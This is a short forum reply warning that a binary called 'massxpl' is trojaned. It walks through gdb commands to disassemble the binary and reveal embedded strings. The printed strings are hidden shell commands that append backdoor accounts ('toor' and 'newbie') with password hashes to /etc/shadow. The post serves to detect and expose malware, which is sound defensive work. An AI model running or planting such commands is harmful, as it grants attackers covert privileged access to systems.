View Single Post
Old 08-28-07, 12:13 PM   #3
Registered User
Join Date: Jul 2005
Posts: 3,606
Default Re: Watch what you trust.

You can also use gdb (GNU Debugger) to analyze the executable.

Run "gdb"
Type "file /path/to/massxpl"
Type "disass main" to run the disassembler on the application

Look for the movl calls, they occur around 0x80494e0 and 0x8049534

Type "x/s [address]" and you'll see:

(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>:    "echo toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
evilghost is offline   Reply With Quote